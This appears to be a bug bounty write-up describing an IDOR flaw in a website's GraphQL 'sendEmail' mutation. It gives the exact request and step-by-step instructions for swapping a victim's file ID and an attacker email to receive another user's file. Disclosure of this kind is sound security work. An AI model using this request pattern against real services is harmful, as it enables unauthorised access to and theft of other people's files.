IDOR Vulnerability In GraphQL Api On Website

Assalamualaikum Bug Hunter & Hello everyone.

In this article I want to share my experience with Insecure direct object references ( IDOR ) findings in GraphQL API on a website.

Image Source: https://threatpost.com/how-to-bug-bounties/165657/

When I did testing with Sandro Proxy tool. Then, I found the responses snippet from the Graphql Api, here’s the snippet:

[{“operation”:”sendEmail”,”variables”:{“[Path]Id”:”1002203272",”[Path]Hash”:”38C09************788Y”,”lang”:”id”,”emails”:[“victim@gmail.com”]},”query”:”mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n”}]

The responses above are the behavior to download a file which will later be sent to the intended email.

In the Graphql Api responds above I took the snippet:

1. “[Path]Id”:”1002203272"
2. “[Path]Hash”:”38C09************788Y
Here a website implements [Path]Id & [Path]Hash . I don’t know for sure the reason why it was made, and I assume if the [Path]Id is successfully found by the Attacker, then the Attacker must be able to find out the Victim’s [Path]Hash. And this implementation is very safe from IDOR attacks.

3. “emails”:[“victim@gmail.com”]
There’s nothing suspicious about this snippet.

From the above snippet, it may be very difficult to find IDOR vulnerabilities. Because the website implements [Path]Id & [Path]Hash in 1 file. But in the http responds snippet I found Insecure direct object references ( IDOR ) Vulnerabilities stemming from Lack of Authentication in GraphQL Api.

Follow me :)

  1. There is a lack of authentication error in Graphql Api while retrieving the file and then sending it to the destination email.
    Why this happened?
    Because in “operation”:”sendEmail” Graphql API only check “[Path]Id” and uncheck “[Path]Hash” .

2. Open your Burp Suite or Sandro Proxy. Enter the request below:

[{“operation”:”sendEmail”,”variables”:{“[Path]Id”:”1002203272",”[Path]Hash”:”38C09************788Y”,”lang”;”id”,”emails”:[“attacker@gmail.com”]},”query”:”mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n”}]

3. In the snippet:

A. “[Path]Id”:”1002203272"

You can change parameters with random numbers. Example :

[+]. “[Path]Id”:”1002203272" is my parameter file ( Attacker )

[+]. “[Path]Id”:”1002203271" is Victim’s file parameters ( Victim ) and other random parameters.

B. “emails”:[“attacker@gmail.com”]
You can change it with your email which later the victim’s file will be sent to your email.

4. Final :

[{“operation”:”sendEmail”,”variables”:{“[Path]Id”:”1002203271",”[Path]Hash”:”38C09************788Y”,”lang”:”id”,”emails”:[“attacker@gmail.com”]},”query”:”mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n”}]

5. Check your email, and the victim file is sent to your email.

Bounty : $$

Pemburu Bug & Pengujian Penetrasi